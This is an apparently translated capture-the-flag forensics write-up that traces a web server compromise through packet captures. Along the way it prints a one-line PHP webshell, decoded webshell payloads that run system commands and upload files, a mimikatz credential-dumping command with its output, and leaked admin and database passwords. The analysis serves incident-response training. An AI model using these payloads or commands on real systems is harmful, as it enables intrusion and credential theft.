Information Security Triathlon Finals (Data Challenge), Question 4
Someone is running a directory scan.
That pretty much pins down one likely attacker and the victim:
Attacker: 172.16.10.110
Victim: 192.168.20.117
First, filter out all the packets between the two.
PS:
It still seems more reliable, once the attacker and victim are identified, to pull out every packet between them directly:
#!/bin/bash
# attack_dump.sh: from every capture in the current directory, keep the packets involving the attacker or the victim
# (note: 'or' keeps all traffic touching either host; 'host A and host B' would restrict it to traffic strictly between them)
target_folder='attack'
mkdir -p "${target_folder}"
for file in *.pcap; do
  echo "Dumping attack packets in ${file}..."
  tcpdump -A -s 0 'host 172.16.10.110 or host 192.168.20.117' -r "$file" -w "${target_folder}/${file}"
  echo "${file} Done!"
done
An HTTP text dump was generated at the same time.
It still feels quicker to search the HTTP text directly.
First, a plain grep to see whether there is a webshell or anything like it:
888849-Connection: Keep-Alive
888850-Content-Type: text/plain
888851-
888852:<?php @eval($_POST['t'])?>
888853-17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1927878527:1927879124, ack 2736838709, win 64240, length 597
888854-E..}.k@...St..
888855-n...u"...r.... .5P.......POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1
Although this one is actually a text file?
Scrolling up and down a bit, I did find a webshell.
The webshell traffic here seems to have some distinctive features,
for example:
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
array_map
Search using those features:
grep -n -C 5 'spider.html' http.txt | grep 'POST '
Sure enough, two webshells turn up:
/9.php
/uploadfile/2017/0905/20170905055411283.php
My guess is that both webshells were written through some vulnerability.
Search directly for the first place 9.php appears.
Searching for /admin/file_manage_control.php
shows the target is DedeCMS (织梦CMS).
The vulnerability exploited is presumably:
You can see the attacker first used that vulnerability to write 9.php to the server.
When I searched for the other webshell, though, it was simply being used straight away,
and its filename is a timestamp,
so my guess is that it was uploaded to the server through a file upload vulnerability.
Based on the packet details, I found the following article:
http://0day5.com/archives/4368/ (phpcms v9 front-end GetShell)
Exploiting this vulnerability involves a file 1.txt.
Tracing further back,
I found the attacker wrote that 1.txt file via 9.php.
Going back further still: to make DedeCMS write 9.php the attacker needed the administrator's password,
so before that point the password must have been brute-forced.
grep -n 'POST ' http.txt | awk -F 'POST ' '{print $2}' | awk -F 'HTTP/1.1' '{print $1}' | sort | uniq -c
But after searching, it turns out the attacker already knew the back-end login password almost from the start: there was no brute force, just a direct login.
gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC
gotopage=/admin/&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=
Username: admin
Password: 19901109
For the attacker to know the password and simply log in,
there are many possible explanations:
the attacker may have obtained the admin password directly via SQL injection,
or through social engineering,
or through a sensitive-information leak, and so on.
After looking into it, the password was probably not obtained via a visible (non-blind) injection,
since no other occurrence of the same string can be found anywhere in the capture.
I tried to check whether a blind injection was present...
...possibly because of my limited skill, I could not work it out...
Next, let's see what the attacker did with each of the two webshells.
First, 9.php:
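As an added example (my own code, not part of the original writeup), here is the check from the paragraphs above written out: tally the POST targets the way the `sort | uniq -c` pipeline does, then profile the login attempts per account to tell a guessing burst from a single, first-time-correct login. It assumes the POSTs have been flattened to one line per request of the form `<HH:MM:SS> <path> <form body>` (an assumed format, not something the writeup produces), the login path `/admin/login.php` is assumed, and every sample line is constructed: the first set reproduces the single login seen in the capture, the second is an invented burst of guesses for contrast.

```python
"""Was the CMS back-end login brute-forced, or did the attacker know the password?

Added example, not part of the original writeup. Assumed input format: one
line per POST request, "<HH:MM:SS> <path> <form body>", as a field-extraction
tool could emit from http.txt. The DedeCMS login body fields (dopost=login,
userid, pwd) follow the captured body quoted in the writeup; the login path
/admin/login.php and all sample lines are constructed.
"""
from collections import Counter, defaultdict
from urllib.parse import parse_qs


def parse_post_lines(lines):
    """Yield (seconds since midnight, path, parsed form) for each POST line."""
    for line in lines:
        parts = line.strip().split(" ", 2)
        if len(parts) != 3:
            continue
        ts, path, body = parts
        h, m, s = (int(x) for x in ts.split(":"))
        yield h * 3600 + m * 60 + s, path, parse_qs(body)


def tally_post_targets(lines):
    """Equivalent of the writeup's `grep 'POST ' ... | sort | uniq -c` step."""
    return Counter(path for _, path, _ in parse_post_lines(lines))


def login_profile(lines):
    """Per userid: attempt count, distinct passwords tried, first/last timestamp."""
    prof = defaultdict(lambda: {"attempts": 0, "passwords": set(), "first": None, "last": None})
    for t, _, form in parse_post_lines(lines):
        if form.get("dopost") != ["login"]:
            continue
        p = prof[form.get("userid", ["?"])[0]]
        p["attempts"] += 1
        p["passwords"].add(form.get("pwd", [""])[0])
        p["first"] = t if p["first"] is None else min(p["first"], t)
        p["last"] = t if p["last"] is None else max(p["last"], t)
    return prof


def assess_login(profile, user, min_guesses=5, window=300):
    """Label one account's login pattern.

    brute_force  : at least `min_guesses` distinct passwords inside `window` seconds
    direct_login : exactly one attempt, i.e. the credential was known beforehand
    few_retries  : a handful of attempts, typical of a legitimate typo
    no_login     : the account was never attempted
    """
    p = profile.get(user)
    if p is None:
        return "no_login"
    if len(p["passwords"]) >= min_guesses and p["last"] - p["first"] <= window:
        return "brute_force"
    if p["attempts"] == 1:
        return "direct_login"
    return "few_retries"


# Constructed sample A: the single login seen in the capture, nothing guessed before it
DUMP_DIRECT = [
    "17:20:01 /plus/search.php keyword=test",
    "17:31:40 /admin/login.php gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms"
    "&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC",
    "17:33:12 /admin/file_manage_control.php x=1",
]
# Constructed sample B: an eight-second burst of distinct guesses, for contrast
DUMP_BRUTE = [f"17:30:{i:02d} /admin/login.php dopost=login&userid=admin&pwd=guess{i}" for i in range(8)]

if __name__ == "__main__":
    for name, dump in (("direct", DUMP_DIRECT), ("brute", DUMP_BRUTE)):
        print(name, dict(tally_post_targets(dump)), assess_login(login_profile(dump), "admin"))
```

A request-only view cannot tell whether a login succeeded; in the real capture that comes from the response (redirect to the admin panel) and from the admin actions that follow, which is exactly what the writeup reads from the surrounding traffic.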
grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g'
grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' | tr -d '()";\\\' | tr -d "'"
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// Get the system version, username and other details
C:\phpStudy\WWW C: Windows NT WANGGUAN-C938A1 5.2 build 3790 (Windows Server 2003 Enterprise x64 Edition Service Pack 2) i586(Administrator)
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\WWW\\
./ 2017-09-05 17:34:52 0 0777
../ 2017-08-29 11:16:35 0 0777
a/ 2017-09-05 16:05:51 0 0777
admin/ 2017-09-05 16:05:51 0 0777
data/ 2017-09-05 16:18:01 0 0777
images/ 2017-09-05 16:03:30 0 0777
include/ 2017-09-05 16:03:21 0 0777
install/ 2017-09-05 16:06:08 0 0777
member/ 2017-09-05 16:03:24 0 0777
phpMyAdmin/ 2017-08-29 11:16:15 0 0777
plus/ 2017-09-05 16:05:51 0 0777
special/ 2017-09-05 16:05:51 0 0777
templets/ 2017-09-05 16:03:26 0 0777
uploads/ 2017-09-05 16:05:51 0 0777
9.php 2017-09-05 17:34:52 26 0666
favicon.ico 2010-03-11 15:45:00 1150 0666
index.php 2010-02-07 17:05:00 738 0666
robots.txt 2010-02-07 17:05:00 505 0666
tags.php 2010-02-07 17:05:00 633 0666
wap.php 2010-02-07 17:05:00 3938 0666
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\WWW\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// Get the system version, username and other details
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command whoami
wangguan-c938a1\administrator
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&ipconfig&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command ipconfig
Windows IP Configuration.
.
.
Ethernet adapter ........:.
.
Connection-specific DNS Suffix . : .
IP Address. . . . . . . . . . . . : 192.168.20.117.
Subnet Mask . . . . . . . . . . . : 255.255.255.0.
Default Gateway . . . . . . . . . : 192.168.20.1.
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&systeminfo&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command systeminfo
......: WANGGUAN-C938A1
OS ....: Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS ....: 5.2.3790 Service Pack 2 Build 3790
OS ......: Microsoft Corporation
OS ....: ..........
OS ........: Uniprocessor Free
............: wangguan
..........:
.... ID: 91353-645-7659413-50864
............: 2017-8-29, 10:14:19
............: 0 .. 2 .... 55 .. 11 ..
..........: VMware, Inc.
........: VMware Virtual Platform
........: x64-based PC
......: ...... 1 ..........
[01]: EM64T Family 6 Model 60 Stepping 3 GenuineIntel ~3400 Mhz
BIOS ....: UNKNOWN
Windows ....: C:\WINDOWS
........: C:\WINDOWS\system32
........: \Device\HarddiskVolume1
............: zh-cn;....(....)
..............: zh-cn;....(....)
....: (GMT+08:00) ....................................
............: 1,023 MB
..............: 379 MB
........: ......: 2,299 MB
........: ....: 1,854 MB
........: ......: 445 MB
............: C:\pagefile.sys
..: WORKGROUP
..........: \\WANGGUAN-C938A1
........: ...... 1 ............
[
17:35:41.557144 IP 192.168.20.117.http > 172.16.10.110.5299: Flags [P.], seq 2606:2963, ack 4254, win 64240, length 357: HTTP
E...TG@........u..
n.P......5..QP...."..01]: Q147222
....: ...... 1 .. NIC..
[01]: Intel(R) PRO/1000 MT Network Connection
......: ........
.... DHCP: ..
DHCP ......: 192.168.20.1
IP ....
[01]: 192.168.20.117
[S]
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\mimikatz.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a local file and save it as C:\\phpStudy\\WWW\\mimikatz.exe
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\WWW\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command: C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt
// Use mimikatz.exe to harvest the system's passwords and write them to C:\\phpStudy\\WWW\\log.txt
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\WWW\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// Read the contents of the file: C:\\phpStudy\\WWW\\log.txt
.#####. mimikatz 2.1.1 (x64) built on Apr 9 2017 23:24:20
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 21 modules * * */
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : NETWORK SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2017-9-5 14:40:42
SID : S-1-5-20
msv :
[00000002] Primary
* Username : WANGGUAN-C938A1$
* Domain : WORKGROUP
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
wdigest :
* Username : WANGGUAN-C938A1$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : wangguan-c938a1$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 216713 (00000000:00034e89)
Session : Interactive from 0
Us
17:36:47.042287 IP 192.168.20.117.http > 172.16.10.110.5303: Flags [.], seq 1461:2921, ack 767, win 63473, length 1460: HTTP
E...V.@........u..
n.P...#U....8P....n..er Name : Administrator
Domain : WANGGUAN-C938A1
Logon Server : WANGGUAN-C938A1
Logon Time : 2017-9-5 14:41:24
SID : S-1-5-21-2640452580-1396535521-4086226850-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : WANGGUAN-C938A1
* LM : 1160eb40860de5aeb75e0c8d76954a50
* NTLM : 74e0fa3bf5a67fd3b43ed8912042fabb
* SHA1 : 9d464a83db1089ff0b49c72938d2806953594714
wdigest :
* Username : Administrator
* Domain : WANGGUAN-C938A1
* Password : mtfly@123
kerberos :
* Username : Administrator
* Domain : WANGGUAN-C938A1
* Password : mtfly@123
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2017-9-5 14:40:42
SID : S-1-5-19
msv :
wdigest :
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2017-9-5 14:40:42
SID :
msv :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType f
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\log.txt';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read the contents of the file: C:\\phpStudy\\WWW\\log.txt
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\DTools.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as: C:\\phpStudy\\WWW\\DTools.exe
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\WWW\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\WWW\\data\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\data\\common.inc.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Get the contents of the file: C:\\phpStudy\\WWW\\data\\common.inc.php
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\data\\common.inc.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// Get the contents of the file: C:\\phpStudy\\WWW\\data\\common.inc.php
<?php
//..............
$cfg_dbhost = 'localhost';
$cfg_dbname = 'dedecms';
$cfg_dbuser = 'root';
$cfg_dbpwd = 'root';
$cfg_dbprefix = 'dede_';
$cfg_db_language = 'gbk';
?>
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\data\\22.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as: C:\\phpStudy\\WWW\\data\\22.exe
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\WWW\\data\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command: C:\\phpStudy\\WWW\\22.exe
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\phpStudy\\WWW\\data\\22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command: C:\\phpStudy\\WWW\\22.exe
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan?????????.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as: C:\\Hscan***.zip
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\phpStudy\\
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan?????????.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// Upload a file and save it as: C:\\Hscan***.zip
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List every file in the directory C:\\
Documents and Settings/ 2017-08-30 10:26:49 0 0777
phpStudy/ 2017-08-29 11:16:35 0 0777
Program Files/ 2017-08-29 10:19:09 0 0555
Program Files (x86)/ 2017-08-29 10:10:05 0 0555
RECYCLER/ 2017-08-29 11:24:41 0 0777
System Volume Information/ 2017-08-29 10:15:42 0 0777
WINDOWS/ 2017-09-05 17:50:05 0 0777
wmpub/ 2017-08-29 10:11:11 0 0777
AUTOEXEC.BAT 2017-08-29 10:10:54 0 0777
boot.ini 2017-08-29 10:06:43 221 0666
bootfont.bin 2007-03-07 20:00:00 322730 0444
CONFIG.SYS 2017-08-29 10:10:54 0 0666
Hscan...........zip 2017-09-05 17:41:19 1170778 0666
IO.SYS 2017-08-29 10:10:54 0 0444
lcx.exe 2017-09-05 17:49:48 8704 0777
MSDOS.SYS 2017-08-29 10:10:54 0 0444
NTDETECT.COM 2007-03-07 20:00:00 47772 0555
ntldr 2007-03-07 20:00:00 306288 0444
pagefile.sys 2017-09-05 14:40:40 1610612736 0666
